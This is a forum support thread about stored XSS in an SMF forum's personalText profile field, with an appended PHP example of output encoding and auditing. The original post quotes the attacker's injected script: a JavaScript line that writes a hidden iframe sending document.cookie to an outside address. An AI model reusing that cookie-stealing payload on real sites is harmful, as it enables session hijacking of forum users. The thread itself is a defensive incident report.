personalText: XSS

Started by Toomany, December 10, 2004, 02:20:27 AM


Toomany

Literally last night on my forum (RC2), some unknown bad person somehow managed to inject malicious JavaScript into the personalText field of his profile.
When viewing the HTML, his signature looked roughly like this:
<script src=script address></script>
The script, in turn, looked like this:
var a='<iframe src=http://address/?co=' + document.cookie + ' width=0 height=0 style=visibility:hidden></iframe>';document.write(a);

And what's more! In theory, when the profile fields are processed, < and > should be replaced with the corresponding entities &lt; and &gt;. Moreover, they were being replaced - if I opened this person's profile and re-saved it, the tags were killed and turned into entities.

Attention, a question for the experts! :)
HOW did this bad person manage to plant that JavaScript into personalText? :)
Too many shadows, whispering voices,
Faces on posters, too many choices:
If, when, why, what?
How much have you got?
Have you got it, do you get it, if so, how often?
And which do you choose, a hard or soft option?..
How much do you need?..

[Unknown]

#1
I can't read Russian, but you can't put any javascript into your personal text, unless you've changed something.

Try putting <b>test</b> in there.  If you're right, your personal text will be bold.

Now, of course, if you have database access you can manually edit the field, and get the effect I assume you describe.  For this reason, we suggest you do not give your users phpMyAdmin or MySQL server access.

If you're saying that someone did this to you, I will need you to send me Apache access logs from the time it happened, if possible.

-[Unknown]

Toomany

#2
You can't read Russian, I can't write in English... That's a cruel fate =(

Briefly:
Someone has successfully embedded malicious JavaScript into his personal text on my SMF 1.0RC2.
And hell if I know how it bypassed the "</>" filtering - I could not reproduce it.

Now personal text is strip_tags()'ed :) before output - for a while.
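The thread's lesson is that a save-time filter was not enough: a stored value still contained a raw tag, so the browser must be protected at output time regardless of what is in the database. The following is an added example, not SMF's own code; the member rows, the placeholder script address and the function names are constructed for illustration.

```php
<?php
// Added example (not SMF code). Two defensive steps for a profile field such as
// personalText: (1) entity-encode on OUTPUT no matter what is stored, and
// (2) audit stored rows for values the save-time filter should have rewritten.

// Constructed sample rows; the script address is a placeholder, not a real host.
$members = [
    ['id' => 1, 'personalText' => 'Just a regular signature'],
    ['id' => 2, 'personalText' => '&lt;b&gt;bold&lt;/b&gt;'], // what the save filter normally stores
    ['id' => 3, 'personalText' => '<script src=http://SCRIPT-ADDRESS-PLACEHOLDER/a.js></script>'], // bypassed it
];

// (1) Output encoding: the browser never sees a raw < or >, whatever the DB holds.
function renderPersonalText(string $stored): string {
    // ENT_QUOTES also encodes quotes, so the value is safe inside attributes too.
    // double_encode=false keeps already-stored &lt; / &gt; from becoming &amp;lt;.
    return htmlspecialchars($stored, ENT_QUOTES, 'UTF-8', false);
}

// (2) Audit: a stored value with raw angle brackets did not go through the
// save-time filter (re-saving would have encoded it), so list those ids for review.
function findUnfilteredRows(array $rows): array {
    $suspect = [];
    foreach ($rows as $row) {
        if (preg_match('/[<>]/', $row['personalText'])) {
            $suspect[] = $row['id'];
        }
    }
    return $suspect;
}

foreach ($members as $m) {
    echo $m['id'], ': ', renderPersonalText($m['personalText']), PHP_EOL;
}
echo 'Rows that bypassed the input filter: ', implode(', ', findUnfilteredRows($members)), PHP_EOL;

// (3) The injected script read document.cookie, so mark the session cookie HttpOnly
// (call before session_start()) so script cannot read it even if one output path
// forgets to encode.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
```

Encoding at output (step 1) is what makes the strip_tags() stop-gap unnecessary, and the audit (step 2) finds rows that, like the one in the thread, reached the database without passing the filter.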
